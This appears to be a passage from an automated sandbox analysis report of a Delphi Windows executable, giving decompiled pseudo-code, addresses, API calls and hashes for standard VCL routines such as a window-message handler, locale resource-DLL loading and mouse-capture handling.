C-Code - Quality: 93%

			E00466698(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t305;
				signed int _t307;
				struct HWND__* _t312;
				struct HWND__* _t313;
				struct HWND__* _t314;
				void* _t315;
				intOrPtr _t336;
				struct HWND__* _t340;
				intOrPtr _t362;
				void* _t364;
				void* _t368;
				void* _t369;
				intOrPtr _t370;

				_t315 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t369);
				_push(0x466d4f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t370;
				 *(_v12 + 0xc) = 0;
				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t305 < 0) {
					L5:
					E0046654C(_v8, _t315, _v12);
					_t307 =  *_v12;
					_t161 = _t307;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_pop(_t336);
									 *[fs:eax] = _t336;
									return 0;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004687DC(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
								} else {
									L101:
									E00466610(_t369); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E004672E8(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0046728C(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t340 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
										_t191 = E0045E3A4(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E004677DC(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t365 = _t197;
								_t199 = E0044D590(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0044D590(_t365));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0044D590(_t365));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x4a0f34 = 0;
											_t206 = GetFocus();
											SetFocus(E0044D590(_t365));
											E00447F3C(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x4a0f34 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0046714C(_v8, _t315, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00466DB4(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00466E64(_v8);
								} else {
									E00466610(_t369);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E0043373C(E00433634());
							__eflags = _t247;
							if(_t247 != 0) {
								E00433798(E00433634());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E00466D98(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t312 = E0040E964("vcltest3.dll", _t307, 0x8000);
											 *(_v8 + 0xa0) = _t312;
											__eflags = _t312;
											if(_t312 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_v16 = _t313;
												__eflags = _t313;
												if(_t313 != 0) {
													_t269 =  *(_v12 + 8);
													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x4bcb80; // 0x1c40e90
							E00465AE0(_t272);
							E00466610(_t369);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x4bb1d8; // 0x4bcadc
							E00451FA8( *_t276, _t315,  *(_v12 + 4));
							E004665A4(_v8, _t307, _t315, _v12, _t364);
							E00466610(_t369);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E00466610(_t369);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E004664A0();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E004664B0(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							E004042E0();
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M0046673C))) {
						case 0:
							0 = E00424E18(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L0040736C();
							__eax = E00466610(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E00466610(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0045E23C( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L004664A8();
							} else {
								_v8 = E004664B0(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E00466610(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004072CC();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00466610(__ebp);
							} else {
								__eax = E0046664C(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00463C6C(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E00466610(__ebp);
							goto L102;
					}
				} else {
					_t314 = _t305 + 1;
					_t368 = 0;
					do {
						if( *((intOrPtr*)(E0041C834( *((intOrPtr*)(_v8 + 0xa8)), _t315, _t368)))() != 0) {
							_pop(_t362);
							 *[fs:eax] = _t362;
							return 0;
						}
						_t368 = _t368 + 1;
						_t314 = _t314 - 1;
						__eflags = _t314;
					} while (_t314 != 0);
					goto L5;
				}
			}

0x00466698
0x004666a1
0x004666a4
0x004666a9
0x004666aa
0x004666af
0x004666b2
0x004666ba
0x004666c9
0x004666cc
0x00466700
0x00466706
0x0046670e
0x00466710
0x00466712
0x00466715
0x004667c9
0x004667ce
0x0046681f
0x00466824
0x00466845
0x00466845
0x0046684a
0x00466cb7
0x00466cba
0x00466cbe
0x00466cda
0x00466cc0
0x00466ccc
0x00466ccc
0x00466d45
0x00466d47
0x00466d4a
0x00000000
0x00466d4a
0x00466853
0x00466856
0x00466b12
0x0046685c
0x00466d3e
0x00466d3f
0x00466d44
0x00000000
0x00466856
0x00466826
0x00466c7e
0x00466c81
0x00466c85
0x00466cad
0x00466c87
0x00466c95
0x00466c95
0x00000000
0x00466c85
0x0046682c
0x0046682c
0x00466831
0x00466c2c
0x00466c31
0x00466c33
0x00466c39
0x00466c3e
0x00466c41
0x00466c44
0x00466c4c
0x00466c51
0x00466c53
0x00466c5a
0x00466c5a
0x00466c53
0x00466c44
0x00000000
0x00466c33
0x00466837
0x0046683a
0x00466c64
0x00466c74
0x00000000
0x00466840
0x00000000
0x00466840
0x0046683a
0x004667d0
0x00466b3f
0x00466b42
0x00466b44
0x00466b4a
0x00466b4e
0x00466b53
0x00466b55
0x00466b63
0x00466b68
0x00466b6a
0x00466b78
0x00466b7d
0x00466b7f
0x00466b85
0x00466b8c
0x00466b9b
0x00466bb4
0x00466bba
0x00466bbf
0x00466bc9
0x00466bc9
0x00466b7f
0x00466b6a
0x00466b55
0x00000000
0x00466b44
0x004667d6
0x004667db
0x00466806
0x00466806
0x0046680b
0x00466bfd
0x00466c00
0x00466c08
0x00466c1a
0x00466c1a
0x00000000
0x00466c08
0x00466811
0x00466814
0x00466b20
0x00466b25
0x00466b27
0x00466b30
0x00466b30
0x00000000
0x0046681a
0x00000000
0x0046681a
0x00466814
0x004667dd
0x00466bd5
0x00466bd8
0x00466be0
0x00466bf2
0x00466bf2
0x00000000
0x00466be0
0x004667e3
0x004667e3
0x004667e8
0x0046686c
0x0046686c
0x00466871
0x0046687f
0x00466873
0x00466873
0x00466878
0x0046688c
0x0046687a
0x00466897
0x0046689c
0x00466878
0x00000000
0x00466871
0x004667ed
0x004667ed
0x004667f0
0x00466a24
0x00000000
0x00466a24
0x004667f6
0x004667fb
0x00466d20
0x00466d25
0x00466d27
0x00466d2e
0x00466d2e
0x00000000
0x00466801
0x00000000
0x00466801
0x004667fb
0x0046671b
0x00000000
0x00000000
0x00466721
0x00466724
0x00466790
0x00466793
0x004667b2
0x004667b2
0x004667b5
0x00466902
0x00000000
0x00466902
0x004667bb
0x004667be
0x00466a43
0x00466a49
0x00466a4f
0x00466a55
0x00466a58
0x00466a5f
0x00466a65
0x00466a68
0x00466a6f
0x00466af1
0x00466a71
0x00466a80
0x00466a85
0x00466a8b
0x00466a8d
0x00466ad9
0x00466ae1
0x00466a8f
0x00466a94
0x00466aab
0x00466aad
0x00466ab0
0x00466ab2
0x00466abb
0x00466ac9
0x00466ac9
0x00466ab2
0x00466a8d
0x00466a6f
0x00466a5f
0x00000000
0x004667c4
0x00000000
0x004667c4
0x004667be
0x00466795
0x00466d08
0x00466d0d
0x00466d13
0x00000000
0x00466d18
0x0046679b
0x0046679b
0x0046679e
0x00466ce8
0x00466cef
0x00466cfa
0x00466d00
0x00000000
0x00466d05
0x004667a4
0x004667a7
0x0046692c
0x00466932
0x00466935
0x00466939
0x0046693f
0x00466945
0x00466948
0x0046694c
0x00466973
0x00466988
0x0046694e
0x00466951
0x00466966
0x00466966
0x00000000
0x004667ad
0x00000000
0x004667ad
0x004667a7
0x00466726
0x00466a2c
0x00466a2f
0x00466a33
0x00466a39
0x00466a39
0x00000000
0x00466a33
0x0046672c
0x0046672f
0x00000000
0x00000000
0x00466735
0x00000000
0x00466d37
0x00000000
0x00000000
0x00000000
0x00000000
0x0046690a
0x0046690c
0x0046690e
0x00466916
0x00466919
0x0046691a
0x00466920
0x00000000
0x00000000
0x00466992
0x00466995
0x00466999
0x004669cd
0x004669d3
0x004669d6
0x004669dd
0x004669df
0x004669e2
0x004669e5
0x004669ea
0x004669ed
0x004669ed
0x004669f6
0x0046699b
0x0046699e
0x004669a3
0x004669a6
0x004669ac
0x004669ae
0x004669b5
0x004669b8
0x004669b8
0x004669ba
0x004669ba
0x004669c1
0x004669c6
0x00000000
0x00000000
0x004668ba
0x004668bd
0x004668c0
0x004668c1
0x004668c6
0x004668c8
0x004668d7
0x004668ca
0x004668cb
0x004668d0
0x00000000
0x00000000
0x004668a2
0x004668a5
0x004668a8
0x004668aa
0x004668b0
0x004668b0
0x00000000
0x00000000
0x004668e2
0x004668e5
0x004668ec
0x00000000
0x00000000
0x004666ce
0x004666ce
0x004666cf
0x004666d1
0x004666ed
0x004666f1
0x004666f4
0x00000000
0x004666f4
0x004666fc
0x004666fd
0x004666fd
0x004666fd
0x00000000
0x004666d1

Strings

RegisterAutomation, xrefs: 00466A97
vcltest3.dll, xrefs: 00466A76

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: b6c7edd36508b99548b432208c35770ba76f4e7e018f4cbead578545e214f181
Instruction ID: 9f100de1b60680ee6c751446b834187cece7d860d5bbae6ffedc49d3f7f3c67a
Opcode Fuzzy Hash: b6c7edd36508b99548b432208c35770ba76f4e7e018f4cbead578545e214f181
Instruction Fuzzy Hash: BCE17134B04204EFDB50DFA9C585A5EB7B4AF04314F1681A7E8449B356EB38EE41DB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00405D87, Relevance: 15.1, APIs: 10, Instructions: 101
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405D87() {
				void* _t42;
				void* _t45;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t67;
				void* _t76;

				_push(0x105);
				_push( *((intOrPtr*)(_t76 - 4)));
				_push(_t76 - 0x121);
				L00401350();
				GetLocaleInfoA(GetThreadLocale(), 3, _t76 - 0xd, 5); // executed
				_t67 = 0;
				if( *(_t76 - 0x121) == 0 ||  *(_t76 - 0xd) == 0 &&  *((char*)(_t76 - 0x12)) == 0) {
					L14:
					return _t67;
				} else {
					_t42 = _t76 - 0x121;
					_push(_t42);
					L00401358();
					 *((intOrPtr*)(_t76 - 0x1c)) = _t42 + _t76 - 0x121;
					L5:
					if( *((char*)( *((intOrPtr*)(_t76 - 0x1c)))) != 0x2e && _t76 - 0x121 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
						goto L5;
					}
					_t45 = _t76 - 0x121;
					if(_t45 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
						if( *((char*)(_t76 - 0x12)) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t45);
							_push(_t76 - 0x12);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L00401350();
							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
						}
						if(_t67 == 0 &&  *(_t76 - 0xd) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
							_push(_t76 - 0xd);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L00401350();
							_t52 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
							_t67 = _t52;
							if(_t67 == 0) {
								 *((char*)(_t76 - 0xb)) = 0;
								_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
								_push(_t76 - 0xd);
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								L00401350();
								_t59 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
								_t67 = _t59;
							}
						}
					}
					goto L14;
				}
			}

0x00405d87
0x00405d8f
0x00405d96
0x00405d97
0x00405daa
0x00405daf
0x00405db8
0x00405eb7
0x00405ebd
0x00405dce
0x00405dce
0x00405dd4
0x00405dd5
0x00405de2
0x00405dea
0x00405df0
0x00405de7
0x00000000
0x00405de7
0x00405dfd
0x00405e06
0x00405e0c
0x00405e13
0x00405e21
0x00405e25
0x00405e29
0x00405e2a
0x00405e3f
0x00405e3f
0x00405e43
0x00405e5d
0x00405e61
0x00405e65
0x00405e66
0x00405e76
0x00405e7b
0x00405e7f
0x00405e81
0x00405e97
0x00405e9b
0x00405e9f
0x00405ea0
0x00405eb0
0x00405eb5
0x00405eb5
0x00405e7f
0x00405e43
0x00000000
0x00405e06

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D97
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA4
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DAA
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD5
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E2A
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E3A
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E66
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E76
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00405EA0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00405EB0

Strings

Software\Borland\Locales, xrefs: 00405CAB, 00405CC9
Software\Borland\Delphi\Locales, xrefs: 00405CE7

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 4cafef0d05a7501c3ecb8cd799bf502a5d03e8f44119ef1033d53ecd9e50e5d6
Instruction ID: c6cc543f779af1b06d000f61bcb6ff01c81c68deff5b5284ae5dd448b00e11f2
Opcode Fuzzy Hash: 4cafef0d05a7501c3ecb8cd799bf502a5d03e8f44119ef1033d53ecd9e50e5d6
Instruction Fuzzy Hash: 5E315A71E002096EEB15DAE8C889BEFB7BCDB58304F0480A6A645F26C1D6BC9A458F54

Uniqueness

Uniqueness Score: -1.00%

Function 0044AFA4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0044AFA4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E004474EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E00448008(_t50, _t68); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0044AF10(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0044D894(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E0044D590(_t50);
						_push(_t32);
						L0040703C();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E00448008(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407588( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E00446888(_t50,  &_v28,  &_v20);
					_t21 = E0044AE7C(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E0045E640(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0044D590(__eax);
						if(_t45 == GetCapture() &&  *0x4a0da8 != 0) {
							_t47 =  *0x4a0da8; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x4a0da8; // 0x0
								E00447F3C(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x0044afaa
0x0044afac
0x0044afae
0x0044afb0
0x0044afb5
0x0044afd4
0x0044afd7
0x0044b0b4
0x0044b0bb
0x0044b106
0x0044b106
0x0044b106
0x0044b0f7
0x0044b0fb
0x00000000
0x0044b0fb
0x0044afe5
0x0044b07e
0x0044b085
0x00000000
0x00000000
0x0044b08b
0x00000000
0x00000000
0x0044b08f
0x0044b096
0x00000000
0x00000000
0x0044b09b
0x0044b09f
0x0044b0a2
0x0044b0a5
0x0044b0aa
0x0044b0ab
0x00000000
0x0044b0ab
0x00000000
0x0044afeb
0x0044afb7
0x0044b02d
0x0044b036
0x00000000
0x00000000
0x0044b045
0x0044b054
0x0044b061
0x0044b068
0x00000000
0x00000000
0x0044b06e
0x00000000
0x0044b06e
0x0044afb9
0x0044afbc
0x0044aff7
0x0044affb
0x00000000
0x00000000
0x0044b007
0x0044b00f
0x00000000
0x00000000
0x00000000
0x0044b015
0x0044afbe
0x0044afbf
0x0044b01e
0x00000000
0x00000000
0x0044afc1
0x0044afc4
0x0044b0c1
0x0044b0cf
0x0044b0da
0x0044b0e2
0x0044b0ed
0x0044b0f2
0x0044b0f2
0x0044b0e2
0x0044b0cf
0x0044afc4

APIs

GetCapture.USER32 ref: 0044B0C8

Strings

, xrefs: 0044B01A

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: f674447b006fd8a9af223261cda06af40523fc1caccc54c959f335bd62c4f678
Instruction ID: c4dc3370344b3c30aa3d07022b194b45a34ec8b63cecf96f84074e2b32ecc106
Opcode Fuzzy Hash: f674447b006fd8a9af223261cda06af40523fc1caccc54c959f335bd62c4f678
Instruction Fuzzy Hash: A231B0317046044BF720AA3E8C8972B6395DB45359F14893FB866CB786DB7CDC0A878E

Uniqueness

Uniqueness Score: -1.00%

Function 00452658, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00452658(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4526de);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x4bcae4 =  *0x4bcae4 - 1;
				if( *0x4bcae4 < 0) {
					 *0x4bcae0 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x4bcae0;
					E00452408(_t16, __edi,  *0x4bcae0);
					_t6 =  *0x442540; // 0x44258c
					E0041BE54(_t6, _t16, _t17,  *0x4bcae0);
					_t8 =  *0x442540; // 0x44258c
					E0041BEF4(_t8, _t16, _t17, _t31);
					_t21 =  *0x442540; // 0x44258c
					_t10 =  *0x45422c; // 0x454278
					E0041BEA0(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x442540; // 0x44258c
					_t12 =  *0x4526e8; // 0x452734
